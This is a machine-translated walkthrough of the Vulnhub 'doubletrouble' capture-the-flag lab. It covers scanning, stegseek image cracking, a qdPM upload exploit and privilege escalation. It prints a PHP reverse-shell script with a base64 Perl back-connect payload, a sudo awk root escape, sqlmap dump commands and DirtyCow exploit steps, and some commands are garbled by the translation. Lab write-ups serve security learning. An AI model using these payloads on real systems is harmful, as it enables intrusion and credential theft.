Vulnhub actual combat – doubletrouble target 👻

Time:2022-4-19

Vulnhub actual combat – doubletrouble target

Target download address:https://www.vulnhub.com/entry/doubletrouble-1,743/
Download the ova format file on the page, import it into VMware, or open vitrualbox

Target 1 penetration test

1. Target description

describe
Back to the top
Get flag
Difficulty: easy
About VM: Test and export from VirtualBox. DHCP and nested vtx / AMDV are enabled. You can contact me via email for troubleshooting or problems.
This is more effective for VirtualBox than VMware
Here's a small tip: because the ova format file is exported from the virtual machine of vitrualbox, you can't receive it if you open it in VMware
IP address, because the network card name of vitrualbox is eth or something, followed by a number. The network card name of VMware usually starts with ens, so you are
The virtual machine exported by vitrualbox will not automatically obtain IP when VMware is turned on. You need to change the network card to consistent and then restart to obtain IP. If you won't change the network
Card, please refer to the following link:
https://blog.csdn.net/PeterWuu/article/details/105640638
The second step of this tutorial seems to be: RW single init = / bin / Bash
It should not be I. The tutorial says I. maybe the author made a mistake!

2. Host discovery and port scanning

First, we import the virtual machine into VMware or virtual box. Here I import VMware, and then open it

  1. Host detection

nmap -sn 192.168.33.0/24

image

There are many virtual machines in the LAN here. If there are many virtual machines in your LAN and you can’t distinguish them, you can match the corresponding IP address through the MAC address. The MAC address can be seen in the virtual machine settings

  1. Perform port scan

nmap -sS -p- -v -O 192.168.33.163

image

We can see that ports 22 and 80 are turned on, which proves that SSH and web services are turned on. As mentioned in the previous article, you can try to brutally crack the user name and password of SSH. Use the Hydra tool provided by Kali. After my last attempt, I found that the probability is very small, unless it is usedadmin:123456Such a weak password.

3. Web service detection

We access the IP address192.168.33.163Get the following page

image

Let’s use it firstdirsearchScan the directory

python3 dirsearch.py -u 'http://192.168.33.163' -i 200

image

We can see that, sure enough, we swept out the common directories and checked them one by one. We didn’t find anything. Finally, we found it/secret/There is a picture under the directory. Baidu found that it can use stegseek tool to crack this picture violently.
Download reference link:https://www.freebuf.com/sectool/261633.html
Then we use Kali’s own dictionary rockyou Txt. The dictionary is in Kali’s / usr / share / wordlist directory. It is a compressed package and needs to be decompressed first

stegseek /root/doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf output

image

After we cracked the picture, we generated an output file and found a user name and password in it. Don’t guess it must be the user name and password of the login page just now. Let’s have a try!
After logging in, I found a file uploaded in my personal settings

image

Qdpm vulnerability exploitation

At the beginning of the landing page, we can see a qdpm 9.1. Search for the vulnerability of qdpm 9.1, and we found a remote code execution vulnerability.https://www.exploit-db.com/exploits/50175, download the script. There is something wrong with the carriage return of this script. You need to adjust it yourself. However, this vulnerability is also quite simple. In fact, the picture column of the user’s myaccount interface can upload files, so we can upload a PHP rebound shell script.
I don’t know what’s going on here. Anyway, I didn’t upload the script successfully. If someone succeeds, please let me know. Here I’ve prepared a PHP rebound shell script. You can change the IP port and upload it directly.

'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?>

The funny thing here is that whether you run the script or upload it manually, the feedback from the web page and code will make you feel whether you failed to upload it. It will report an error, but it has been uploaded successfully.
After uploading, the script is in the / uploads / users directory where we just started the directory scanning

image

Then Kali listens to port 10086, which is the port set by your script.

nc -lnvp 10086

image

Right raising

Next, let’s take a look at the sudo permissions that the current user can use. It shows that the current user can execute the awk command without secret

image

Search for awk rights. We can:

sudo awk 'BEGIN {system("/bin/bash")}'

image

We can see that we are already the root user at this time. Look at the root folder and find an ova file. Baidu knows this is another virtual machine after reading the boss blog, good guy! It is worthy of being doubletrouble. Sure enough, it still echoes the topic. We download this virtual machine file and open it in VMware.

We start the HTTP service function in the target machine, then Kali downloads it through WGet, and then start the target machine in VMware. Then follow the previous steps to scan the host IP, port and service.

python3 -m http.server 9000

wget http://192.168.33.163:9000/doubletrouble.ova

The following is the usage of Python – M:

image

Target 2 penetration test

1. Host detection

nmap -sn 192.168.33.0/24

image

2. Port, service discovery

nmap -sS -p- -v -O 192.168.33.252

image

3. Web Service Testing

First, through port scanning, we found that port 80 is open, indicating that there is an HTTP service. When we visit the IP address, we see the following login box page:

image

Here let’s enter the user name and password, but we don’t know the account name or password. Try to scan the website directory and find that there is no additional information. There is only one website.

Sqlmap injection to obtain user name and password

We also thought of an artifact sqlmap. Check whether there is injection in the login box through sqlmap. Grab the package and save the file 1 Txt, open sqlmap scan in Kali, and the command is as follows:

sqlmap -r /root/1. Txt -- current dB // the database name doubletrouble appears
sqlmap -r /root/1. Txt - D doubletrouble -- tables // burst table
sqlmap -r /root/1. Txt - D doubletrouble - t users -- columns // burst fields
sqlmap -r /root/1. Txt - D doubletrouble - t users -- dump // burst content

image

image

image

image

We can see that there are two pairs of passwords here. The first pair seems useless, and the second pair can be connected to SSH

ssh [email protected]

image

Right raising

Let’s have a look. This user is just an ordinary user. There is a user under the directory Txt, which is a string of characters. Next, we’ll find a way to get the root permission and see what’s in the root folder. Let’s look at the system version first

uname -a

image

Here’s oneDirty cow loophole, vulnerability No.: cve-2016-5195 vulnerability type kernel race condition vulnerability harm local rights lifting impact scope Linux kernel > 2.6.22. The vulnerability is a conditional contention vulnerability in the memory subsystem of the Linux kernel when processing copy on write, which can destroy the private read-only memory mapping. After obtaining local users with low privileges, hackers can use this vulnerability to obtain the write permission of other read-only memory mappings and further obtain root permission. It has many POCS, which can generate a root user with an account named firepart,https://github.com/FireFart/dirtycow
We download the POC to the / tmp directory of the target, then compile and execute it.

Here, because there are no git, WGet and Yum commands on the target, we can copy the code through touch dirty C create a C file, then paste it in, compile and execute it.

gcc -pthread dirty.c -o dirty -lcrypt
./dirty
su firefart
//In the middle, we will enter a password, which is the password of firepart, and then we can log in

image


image